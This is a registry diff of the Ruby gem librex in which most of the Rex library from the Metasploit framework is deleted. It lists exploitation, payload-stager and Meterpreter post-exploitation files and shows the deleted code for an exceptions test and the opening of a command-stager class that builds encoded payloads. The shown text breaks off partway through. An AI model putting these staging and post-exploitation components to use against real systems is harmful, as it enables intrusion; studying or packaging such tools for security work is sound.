librex 0.0.13 → 0.0.15

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (435) hide show
  1. data/README.markdown +1 -1
  2. data/Rakefile +1 -0
  3. metadata +3 -435
  4. data/lib/rex/LICENSE +0 -29
  5. data/lib/rex/arch.rb +0 -103
  6. data/lib/rex/arch/sparc.rb +0 -75
  7. data/lib/rex/arch/sparc.rb.ut.rb +0 -18
  8. data/lib/rex/arch/x86.rb +0 -513
  9. data/lib/rex/arch/x86.rb.ut.rb +0 -93
  10. data/lib/rex/assembly/nasm.rb +0 -104
  11. data/lib/rex/assembly/nasm.rb.ut.rb +0 -22
  12. data/lib/rex/codepage.map +0 -104
  13. data/lib/rex/compat.rb +0 -311
  14. data/lib/rex/constants.rb +0 -113
  15. data/lib/rex/elfparsey.rb +0 -11
  16. data/lib/rex/elfparsey/elf.rb +0 -123
  17. data/lib/rex/elfparsey/elfbase.rb +0 -258
  18. data/lib/rex/elfparsey/exceptions.rb +0 -27
  19. data/lib/rex/elfscan.rb +0 -12
  20. data/lib/rex/elfscan/scanner.rb +0 -207
  21. data/lib/rex/elfscan/search.rb +0 -46
  22. data/lib/rex/encoder/alpha2.rb +0 -31
  23. data/lib/rex/encoder/alpha2/alpha_mixed.rb +0 -68
  24. data/lib/rex/encoder/alpha2/alpha_upper.rb +0 -79
  25. data/lib/rex/encoder/alpha2/generic.rb +0 -114
  26. data/lib/rex/encoder/alpha2/unicode_mixed.rb +0 -117
  27. data/lib/rex/encoder/alpha2/unicode_upper.rb +0 -129
  28. data/lib/rex/encoder/ndr.rb +0 -89
  29. data/lib/rex/encoder/ndr.rb.ut.rb +0 -44
  30. data/lib/rex/encoder/nonalpha.rb +0 -61
  31. data/lib/rex/encoder/nonupper.rb +0 -64
  32. data/lib/rex/encoder/xdr.rb +0 -106
  33. data/lib/rex/encoder/xdr.rb.ut.rb +0 -29
  34. data/lib/rex/encoder/xor.rb +0 -69
  35. data/lib/rex/encoder/xor/dword.rb +0 -13
  36. data/lib/rex/encoder/xor/dword_additive.rb +0 -13
  37. data/lib/rex/encoders/xor_dword.rb +0 -35
  38. data/lib/rex/encoders/xor_dword_additive.rb +0 -53
  39. data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +0 -12
  40. data/lib/rex/encoding/xor.rb +0 -20
  41. data/lib/rex/encoding/xor.rb.ts.rb +0 -14
  42. data/lib/rex/encoding/xor/byte.rb +0 -15
  43. data/lib/rex/encoding/xor/byte.rb.ut.rb +0 -21
  44. data/lib/rex/encoding/xor/dword.rb +0 -21
  45. data/lib/rex/encoding/xor/dword.rb.ut.rb +0 -15
  46. data/lib/rex/encoding/xor/dword_additive.rb +0 -92
  47. data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +0 -15
  48. data/lib/rex/encoding/xor/exceptions.rb +0 -17
  49. data/lib/rex/encoding/xor/generic.rb +0 -146
  50. data/lib/rex/encoding/xor/generic.rb.ut.rb +0 -120
  51. data/lib/rex/encoding/xor/qword.rb +0 -15
  52. data/lib/rex/encoding/xor/word.rb +0 -21
  53. data/lib/rex/encoding/xor/word.rb.ut.rb +0 -13
  54. data/lib/rex/exceptions.rb +0 -275
  55. data/lib/rex/exceptions.rb.ut.rb +0 -44
  56. data/lib/rex/exploitation/cmdstager.rb +0 -9
  57. data/lib/rex/exploitation/cmdstager/base.rb +0 -175
  58. data/lib/rex/exploitation/cmdstager/debug_asm.rb +0 -142
  59. data/lib/rex/exploitation/cmdstager/debug_write.rb +0 -136
  60. data/lib/rex/exploitation/cmdstager/tftp.rb +0 -63
  61. data/lib/rex/exploitation/cmdstager/vbs.rb +0 -128
  62. data/lib/rex/exploitation/egghunter.rb +0 -277
  63. data/lib/rex/exploitation/egghunter.rb.ut.rb +0 -25
  64. data/lib/rex/exploitation/encryptjs.rb +0 -77
  65. data/lib/rex/exploitation/heaplib.js.b64 +0 -331
  66. data/lib/rex/exploitation/heaplib.rb +0 -94
  67. data/lib/rex/exploitation/javascriptosdetect.rb +0 -897
  68. data/lib/rex/exploitation/obfuscatejs.rb +0 -335
  69. data/lib/rex/exploitation/omelet.rb +0 -320
  70. data/lib/rex/exploitation/omelet.rb.ut.rb +0 -13
  71. data/lib/rex/exploitation/opcodedb.rb +0 -818
  72. data/lib/rex/exploitation/opcodedb.rb.ut.rb +0 -279
  73. data/lib/rex/exploitation/seh.rb +0 -92
  74. data/lib/rex/exploitation/seh.rb.ut.rb +0 -19
  75. data/lib/rex/file.rb +0 -112
  76. data/lib/rex/file.rb.ut.rb +0 -16
  77. data/lib/rex/image_source.rb +0 -12
  78. data/lib/rex/image_source/disk.rb +0 -60
  79. data/lib/rex/image_source/image_source.rb +0 -46
  80. data/lib/rex/image_source/memory.rb +0 -37
  81. data/lib/rex/io/bidirectional_pipe.rb +0 -157
  82. data/lib/rex/io/datagram_abstraction.rb +0 -35
  83. data/lib/rex/io/stream.rb +0 -319
  84. data/lib/rex/io/stream_abstraction.rb +0 -197
  85. data/lib/rex/io/stream_server.rb +0 -211
  86. data/lib/rex/job_container.rb +0 -187
  87. data/lib/rex/logging.rb +0 -4
  88. data/lib/rex/logging/log_dispatcher.rb +0 -179
  89. data/lib/rex/logging/log_sink.rb +0 -42
  90. data/lib/rex/logging/sinks/flatfile.rb +0 -55
  91. data/lib/rex/logging/sinks/stderr.rb +0 -43
  92. data/lib/rex/machparsey.rb +0 -9
  93. data/lib/rex/machparsey/exceptions.rb +0 -34
  94. data/lib/rex/machparsey/mach.rb +0 -209
  95. data/lib/rex/machparsey/machbase.rb +0 -408
  96. data/lib/rex/machscan.rb +0 -9
  97. data/lib/rex/machscan/scanner.rb +0 -217
  98. data/lib/rex/mime.rb +0 -9
  99. data/lib/rex/mime/header.rb +0 -77
  100. data/lib/rex/mime/message.rb +0 -144
  101. data/lib/rex/mime/part.rb +0 -20
  102. data/lib/rex/nop/opty2.rb +0 -108
  103. data/lib/rex/nop/opty2.rb.ut.rb +0 -23
  104. data/lib/rex/nop/opty2_tables.rb +0 -300
  105. data/lib/rex/ole.rb +0 -205
  106. data/lib/rex/ole/clsid.rb +0 -47
  107. data/lib/rex/ole/difat.rb +0 -141
  108. data/lib/rex/ole/directory.rb +0 -231
  109. data/lib/rex/ole/direntry.rb +0 -240
  110. data/lib/rex/ole/docs/dependencies.txt +0 -8
  111. data/lib/rex/ole/docs/references.txt +0 -1
  112. data/lib/rex/ole/fat.rb +0 -99
  113. data/lib/rex/ole/header.rb +0 -204
  114. data/lib/rex/ole/minifat.rb +0 -77
  115. data/lib/rex/ole/propset.rb +0 -144
  116. data/lib/rex/ole/samples/create_ole.rb +0 -27
  117. data/lib/rex/ole/samples/dir.rb +0 -35
  118. data/lib/rex/ole/samples/dump_stream.rb +0 -34
  119. data/lib/rex/ole/samples/ole_info.rb +0 -23
  120. data/lib/rex/ole/storage.rb +0 -395
  121. data/lib/rex/ole/stream.rb +0 -53
  122. data/lib/rex/ole/substorage.rb +0 -49
  123. data/lib/rex/ole/util.rb +0 -157
  124. data/lib/rex/parser/arguments.rb +0 -97
  125. data/lib/rex/parser/arguments.rb.ut.rb +0 -67
  126. data/lib/rex/parser/ini.rb +0 -185
  127. data/lib/rex/parser/ini.rb.ut.rb +0 -29
  128. data/lib/rex/parser/ip360_aspl_xml.rb +0 -102
  129. data/lib/rex/parser/ip360_xml.rb +0 -93
  130. data/lib/rex/parser/nessus_xml.rb +0 -118
  131. data/lib/rex/parser/netsparker_xml.rb +0 -94
  132. data/lib/rex/parser/nexpose_xml.rb +0 -131
  133. data/lib/rex/parser/nmap_xml.rb +0 -121
  134. data/lib/rex/parser/retina_xml.rb +0 -109
  135. data/lib/rex/payloads.rb +0 -1
  136. data/lib/rex/payloads/win32.rb +0 -2
  137. data/lib/rex/payloads/win32/common.rb +0 -26
  138. data/lib/rex/payloads/win32/kernel.rb +0 -53
  139. data/lib/rex/payloads/win32/kernel/common.rb +0 -54
  140. data/lib/rex/payloads/win32/kernel/migration.rb +0 -12
  141. data/lib/rex/payloads/win32/kernel/recovery.rb +0 -50
  142. data/lib/rex/payloads/win32/kernel/stager.rb +0 -194
  143. data/lib/rex/peparsey.rb +0 -12
  144. data/lib/rex/peparsey/exceptions.rb +0 -32
  145. data/lib/rex/peparsey/pe.rb +0 -212
  146. data/lib/rex/peparsey/pe_memdump.rb +0 -63
  147. data/lib/rex/peparsey/pebase.rb +0 -1680
  148. data/lib/rex/peparsey/section.rb +0 -136
  149. data/lib/rex/pescan.rb +0 -13
  150. data/lib/rex/pescan/analyze.rb +0 -309
  151. data/lib/rex/pescan/scanner.rb +0 -206
  152. data/lib/rex/pescan/search.rb +0 -56
  153. data/lib/rex/platforms.rb +0 -1
  154. data/lib/rex/platforms/windows.rb +0 -51
  155. data/lib/rex/poly.rb +0 -132
  156. data/lib/rex/poly/block.rb +0 -477
  157. data/lib/rex/poly/register.rb +0 -100
  158. data/lib/rex/poly/register/x86.rb +0 -40
  159. data/lib/rex/post.rb +0 -8
  160. data/lib/rex/post/dir.rb +0 -51
  161. data/lib/rex/post/file.rb +0 -172
  162. data/lib/rex/post/file_stat.rb +0 -220
  163. data/lib/rex/post/gen.pl +0 -13
  164. data/lib/rex/post/io.rb +0 -182
  165. data/lib/rex/post/meterpreter.rb +0 -4
  166. data/lib/rex/post/meterpreter/channel.rb +0 -445
  167. data/lib/rex/post/meterpreter/channel_container.rb +0 -54
  168. data/lib/rex/post/meterpreter/channels/pool.rb +0 -160
  169. data/lib/rex/post/meterpreter/channels/pools/file.rb +0 -62
  170. data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +0 -103
  171. data/lib/rex/post/meterpreter/channels/stream.rb +0 -87
  172. data/lib/rex/post/meterpreter/client.rb +0 -364
  173. data/lib/rex/post/meterpreter/client_core.rb +0 -274
  174. data/lib/rex/post/meterpreter/dependencies.rb +0 -3
  175. data/lib/rex/post/meterpreter/extension.rb +0 -32
  176. data/lib/rex/post/meterpreter/extensions/espia/espia.rb +0 -58
  177. data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +0 -16
  178. data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +0 -94
  179. data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +0 -21
  180. data/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +0 -57
  181. data/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +0 -15
  182. data/lib/rex/post/meterpreter/extensions/priv/fs.rb +0 -118
  183. data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +0 -61
  184. data/lib/rex/post/meterpreter/extensions/priv/priv.rb +0 -111
  185. data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +0 -28
  186. data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +0 -101
  187. data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +0 -26
  188. data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +0 -333
  189. data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +0 -282
  190. data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +0 -266
  191. data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +0 -103
  192. data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +0 -48
  193. data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +0 -144
  194. data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +0 -73
  195. data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +0 -56
  196. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +0 -137
  197. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +0 -180
  198. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +0 -167
  199. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +0 -208
  200. data/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb +0 -6
  201. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb +0 -38106
  202. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb +0 -31
  203. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb +0 -47
  204. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb +0 -36
  205. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +0 -1818
  206. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb +0 -96
  207. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +0 -3848
  208. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +0 -26
  209. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb +0 -153
  210. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb +0 -21
  211. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb +0 -3169
  212. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +0 -599
  213. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb +0 -318
  214. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb +0 -100
  215. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb +0 -42
  216. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb +0 -148
  217. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb +0 -127
  218. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb +0 -309
  219. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +0 -204
  220. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb +0 -51
  221. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb +0 -630
  222. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb +0 -75
  223. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb +0 -103
  224. data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +0 -149
  225. data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +0 -97
  226. data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +0 -192
  227. data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +0 -41
  228. data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +0 -61
  229. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +0 -370
  230. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +0 -129
  231. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +0 -55
  232. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +0 -336
  233. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +0 -141
  234. data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +0 -279
  235. data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +0 -193
  236. data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +0 -102
  237. data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +0 -180
  238. data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +0 -211
  239. data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +0 -227
  240. data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +0 -63
  241. data/lib/rex/post/meterpreter/inbound_packet_handler.rb +0 -30
  242. data/lib/rex/post/meterpreter/object_aliases.rb +0 -83
  243. data/lib/rex/post/meterpreter/packet.rb +0 -688
  244. data/lib/rex/post/meterpreter/packet_dispatcher.rb +0 -431
  245. data/lib/rex/post/meterpreter/packet_parser.rb +0 -94
  246. data/lib/rex/post/meterpreter/packet_response_waiter.rb +0 -83
  247. data/lib/rex/post/meterpreter/ui/console.rb +0 -137
  248. data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +0 -62
  249. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +0 -730
  250. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +0 -108
  251. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +0 -241
  252. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +0 -231
  253. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +0 -61
  254. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +0 -98
  255. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +0 -51
  256. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +0 -132
  257. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +0 -187
  258. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +0 -65
  259. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +0 -442
  260. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +0 -298
  261. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +0 -486
  262. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +0 -315
  263. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +0 -157
  264. data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +0 -95
  265. data/lib/rex/post/permission.rb +0 -26
  266. data/lib/rex/post/process.rb +0 -57
  267. data/lib/rex/post/thread.rb +0 -57
  268. data/lib/rex/post/ui.rb +0 -52
  269. data/lib/rex/proto.rb +0 -13
  270. data/lib/rex/proto.rb.ts.rb +0 -8
  271. data/lib/rex/proto/dcerpc.rb +0 -6
  272. data/lib/rex/proto/dcerpc.rb.ts.rb +0 -9
  273. data/lib/rex/proto/dcerpc/client.rb +0 -361
  274. data/lib/rex/proto/dcerpc/client.rb.ut.rb +0 -491
  275. data/lib/rex/proto/dcerpc/exceptions.rb +0 -150
  276. data/lib/rex/proto/dcerpc/handle.rb +0 -47
  277. data/lib/rex/proto/dcerpc/handle.rb.ut.rb +0 -85
  278. data/lib/rex/proto/dcerpc/ndr.rb +0 -72
  279. data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +0 -41
  280. data/lib/rex/proto/dcerpc/packet.rb +0 -253
  281. data/lib/rex/proto/dcerpc/packet.rb.ut.rb +0 -56
  282. data/lib/rex/proto/dcerpc/response.rb +0 -187
  283. data/lib/rex/proto/dcerpc/response.rb.ut.rb +0 -15
  284. data/lib/rex/proto/dcerpc/uuid.rb +0 -84
  285. data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +0 -46
  286. data/lib/rex/proto/dhcp.rb +0 -7
  287. data/lib/rex/proto/dhcp/constants.rb +0 -33
  288. data/lib/rex/proto/dhcp/server.rb +0 -292
  289. data/lib/rex/proto/drda.rb +0 -5
  290. data/lib/rex/proto/drda.rb.ts.rb +0 -17
  291. data/lib/rex/proto/drda/constants.rb +0 -49
  292. data/lib/rex/proto/drda/constants.rb.ut.rb +0 -23
  293. data/lib/rex/proto/drda/packet.rb +0 -252
  294. data/lib/rex/proto/drda/packet.rb.ut.rb +0 -109
  295. data/lib/rex/proto/drda/utils.rb +0 -123
  296. data/lib/rex/proto/drda/utils.rb.ut.rb +0 -84
  297. data/lib/rex/proto/http.rb +0 -5
  298. data/lib/rex/proto/http.rb.ts.rb +0 -12
  299. data/lib/rex/proto/http/client.rb +0 -821
  300. data/lib/rex/proto/http/client.rb.ut.rb +0 -95
  301. data/lib/rex/proto/http/handler.rb +0 -46
  302. data/lib/rex/proto/http/handler/erb.rb +0 -128
  303. data/lib/rex/proto/http/handler/erb.rb.ut.rb +0 -21
  304. data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +0 -1
  305. data/lib/rex/proto/http/handler/proc.rb +0 -60
  306. data/lib/rex/proto/http/handler/proc.rb.ut.rb +0 -24
  307. data/lib/rex/proto/http/header.rb +0 -161
  308. data/lib/rex/proto/http/header.rb.ut.rb +0 -46
  309. data/lib/rex/proto/http/packet.rb +0 -407
  310. data/lib/rex/proto/http/packet.rb.ut.rb +0 -165
  311. data/lib/rex/proto/http/request.rb +0 -356
  312. data/lib/rex/proto/http/request.rb.ut.rb +0 -214
  313. data/lib/rex/proto/http/response.rb +0 -90
  314. data/lib/rex/proto/http/response.rb.ut.rb +0 -149
  315. data/lib/rex/proto/http/server.rb +0 -369
  316. data/lib/rex/proto/http/server.rb.ut.rb +0 -79
  317. data/lib/rex/proto/ntlm.rb +0 -7
  318. data/lib/rex/proto/ntlm.rb.ut.rb +0 -177
  319. data/lib/rex/proto/ntlm/base.rb +0 -326
  320. data/lib/rex/proto/ntlm/constants.rb +0 -74
  321. data/lib/rex/proto/ntlm/crypt.rb +0 -415
  322. data/lib/rex/proto/ntlm/exceptions.rb +0 -9
  323. data/lib/rex/proto/ntlm/message.rb +0 -533
  324. data/lib/rex/proto/ntlm/utils.rb +0 -763
  325. data/lib/rex/proto/proxy/socks4a.rb +0 -440
  326. data/lib/rex/proto/rfb.rb +0 -19
  327. data/lib/rex/proto/rfb.rb.ut.rb +0 -37
  328. data/lib/rex/proto/rfb/cipher.rb +0 -84
  329. data/lib/rex/proto/rfb/client.rb +0 -207
  330. data/lib/rex/proto/rfb/constants.rb +0 -52
  331. data/lib/rex/proto/smb.rb +0 -7
  332. data/lib/rex/proto/smb.rb.ts.rb +0 -8
  333. data/lib/rex/proto/smb/client.rb +0 -1952
  334. data/lib/rex/proto/smb/client.rb.ut.rb +0 -223
  335. data/lib/rex/proto/smb/constants.rb +0 -1047
  336. data/lib/rex/proto/smb/constants.rb.ut.rb +0 -18
  337. data/lib/rex/proto/smb/crypt.rb +0 -36
  338. data/lib/rex/proto/smb/evasions.rb +0 -66
  339. data/lib/rex/proto/smb/exceptions.rb +0 -858
  340. data/lib/rex/proto/smb/simpleclient.rb +0 -306
  341. data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -128
  342. data/lib/rex/proto/smb/utils.rb +0 -103
  343. data/lib/rex/proto/smb/utils.rb.ut.rb +0 -20
  344. data/lib/rex/proto/sunrpc.rb +0 -1
  345. data/lib/rex/proto/sunrpc/client.rb +0 -195
  346. data/lib/rex/proto/tftp.rb +0 -12
  347. data/lib/rex/proto/tftp/constants.rb +0 -39
  348. data/lib/rex/proto/tftp/server.rb +0 -497
  349. data/lib/rex/proto/tftp/server.rb.ut.rb +0 -28
  350. data/lib/rex/script.rb +0 -42
  351. data/lib/rex/script/base.rb +0 -59
  352. data/lib/rex/script/meterpreter.rb +0 -15
  353. data/lib/rex/script/shell.rb +0 -9
  354. data/lib/rex/service.rb +0 -48
  355. data/lib/rex/service_manager.rb +0 -141
  356. data/lib/rex/service_manager.rb.ut.rb +0 -32
  357. data/lib/rex/services/local_relay.rb +0 -423
  358. data/lib/rex/socket.rb +0 -684
  359. data/lib/rex/socket.rb.ut.rb +0 -107
  360. data/lib/rex/socket/comm.rb +0 -119
  361. data/lib/rex/socket/comm/local.rb +0 -412
  362. data/lib/rex/socket/comm/local.rb.ut.rb +0 -75
  363. data/lib/rex/socket/ip.rb +0 -130
  364. data/lib/rex/socket/parameters.rb +0 -345
  365. data/lib/rex/socket/parameters.rb.ut.rb +0 -51
  366. data/lib/rex/socket/range_walker.rb +0 -346
  367. data/lib/rex/socket/range_walker.rb.ut.rb +0 -55
  368. data/lib/rex/socket/ssl_tcp.rb +0 -184
  369. data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -39
  370. data/lib/rex/socket/ssl_tcp_server.rb +0 -122
  371. data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -61
  372. data/lib/rex/socket/subnet_walker.rb +0 -75
  373. data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -28
  374. data/lib/rex/socket/switch_board.rb +0 -278
  375. data/lib/rex/socket/switch_board.rb.ut.rb +0 -52
  376. data/lib/rex/socket/tcp.rb +0 -76
  377. data/lib/rex/socket/tcp.rb.ut.rb +0 -64
  378. data/lib/rex/socket/tcp_server.rb +0 -67
  379. data/lib/rex/socket/tcp_server.rb.ut.rb +0 -44
  380. data/lib/rex/socket/udp.rb +0 -164
  381. data/lib/rex/socket/udp.rb.ut.rb +0 -44
  382. data/lib/rex/struct2.rb +0 -5
  383. data/lib/rex/struct2/c_struct.rb +0 -181
  384. data/lib/rex/struct2/c_struct_template.rb +0 -39
  385. data/lib/rex/struct2/constant.rb +0 -26
  386. data/lib/rex/struct2/element.rb +0 -44
  387. data/lib/rex/struct2/generic.rb +0 -73
  388. data/lib/rex/struct2/restraint.rb +0 -54
  389. data/lib/rex/struct2/s_string.rb +0 -72
  390. data/lib/rex/struct2/s_struct.rb +0 -111
  391. data/lib/rex/sync.rb +0 -6
  392. data/lib/rex/sync/event.rb +0 -94
  393. data/lib/rex/sync/read_write_lock.rb +0 -176
  394. data/lib/rex/sync/ref.rb +0 -57
  395. data/lib/rex/sync/thread_safe.rb +0 -82
  396. data/lib/rex/test.rb +0 -35
  397. data/lib/rex/text.rb +0 -1149
  398. data/lib/rex/text.rb.ut.rb +0 -190
  399. data/lib/rex/thread_factory.rb +0 -42
  400. data/lib/rex/time.rb +0 -65
  401. data/lib/rex/transformer.rb +0 -115
  402. data/lib/rex/transformer.rb.ut.rb +0 -38
  403. data/lib/rex/ui.rb +0 -21
  404. data/lib/rex/ui/interactive.rb +0 -254
  405. data/lib/rex/ui/output.rb +0 -78
  406. data/lib/rex/ui/output/none.rb +0 -18
  407. data/lib/rex/ui/progress_tracker.rb +0 -96
  408. data/lib/rex/ui/subscriber.rb +0 -149
  409. data/lib/rex/ui/text/color.rb +0 -97
  410. data/lib/rex/ui/text/color.rb.ut.rb +0 -18
  411. data/lib/rex/ui/text/dispatcher_shell.rb +0 -467
  412. data/lib/rex/ui/text/input.rb +0 -117
  413. data/lib/rex/ui/text/input/buffer.rb +0 -75
  414. data/lib/rex/ui/text/input/readline.rb +0 -129
  415. data/lib/rex/ui/text/input/socket.rb +0 -95
  416. data/lib/rex/ui/text/input/stdio.rb +0 -45
  417. data/lib/rex/ui/text/irb_shell.rb +0 -57
  418. data/lib/rex/ui/text/output.rb +0 -80
  419. data/lib/rex/ui/text/output/buffer.rb +0 -61
  420. data/lib/rex/ui/text/output/file.rb +0 -43
  421. data/lib/rex/ui/text/output/socket.rb +0 -43
  422. data/lib/rex/ui/text/output/stdio.rb +0 -40
  423. data/lib/rex/ui/text/progress_tracker.rb +0 -56
  424. data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -34
  425. data/lib/rex/ui/text/shell.rb +0 -328
  426. data/lib/rex/ui/text/table.rb +0 -279
  427. data/lib/rex/ui/text/table.rb.ut.rb +0 -55
  428. data/lib/rex/zip.rb +0 -93
  429. data/lib/rex/zip/archive.rb +0 -184
  430. data/lib/rex/zip/blocks.rb +0 -182
  431. data/lib/rex/zip/entry.rb +0 -104
  432. data/lib/rex/zip/samples/comment.rb +0 -32
  433. data/lib/rex/zip/samples/mkwar.rb +0 -138
  434. data/lib/rex/zip/samples/mkzip.rb +0 -19
  435. data/lib/rex/zip/samples/recursive.rb +0 -58
@@ -1,44 +0,0 @@
1
- #!/usr/bin/env ruby
2
-
3
- $:.unshift(File.join(File.dirname(__FILE__), '..'))
4
-
5
- require 'test/unit'
6
- require 'rex/exceptions'
7
-
8
- module Rex
9
- module Exceptions
10
-
11
- class UnitTest < Test::Unit::TestCase
12
-
13
- def test_exceptions
14
- Rex.constants.each { |const|
15
- mod = Rex.const_get(const)
16
-
17
- if ((mod.kind_of?(Class) == false) ||
18
- (mod.ancestors.include?(Rex::Exception) == false))
19
- next
20
- end
21
-
22
- begin
23
- raise mod.new
24
- rescue ::ArgumentError
25
- rescue mod => detail
26
- assert_respond_to(detail, 'to_s', "#{mod} does not implement to_s")
27
- assert_not_nil(detail.to_s, "invalid to_s")
28
- end
29
- }
30
-
31
- # Test communication error detail strings
32
- begin
33
- raise ConnectionRefused.new('127.0.0.1', 4444)
34
- rescue HostCommunicationError => detail
35
- assert_match(/^The connection(.*)\(127.0.0.1:4444\)/, detail.to_s)
36
- assert_equal('127.0.0.1', detail.host)
37
- assert_equal(4444, detail.port)
38
- end
39
- end
40
-
41
- end
42
-
43
- end
44
- end
@@ -1,9 +0,0 @@
1
- ##
2
- # $Id: cmdstager.rb 9375 2010-05-26 22:39:56Z jduck $
3
- ##
4
-
5
- require 'rex/exploitation/cmdstager/base'
6
- require 'rex/exploitation/cmdstager/vbs'
7
- require 'rex/exploitation/cmdstager/debug_write'
8
- require 'rex/exploitation/cmdstager/debug_asm'
9
- require 'rex/exploitation/cmdstager/tftp'
@@ -1,175 +0,0 @@
1
- require 'rex/text'
2
- require 'rex/arch'
3
- require 'msf/core/framework'
4
-
5
- module Rex
6
- module Exploitation
7
-
8
- ###
9
- #
10
- # This class provides an interface to generating cmdstagers.
11
- #
12
- ###
13
-
14
- class CmdStagerBase
15
-
16
- def initialize(exe)
17
- @linemax = 2047 # covers most likely cases
18
- @exe = exe
19
- end
20
-
21
- #
22
- # Generates the cmd payload including the h2bv2 decoder and encoded payload.
23
- # The resulting commands also perform cleanup, removing any left over files
24
- #
25
- def generate(opts = {})
26
- # Allow temporary directory override
27
- @tempdir = opts[:temp]
28
- @tempdir ||= "%TEMP%\\"
29
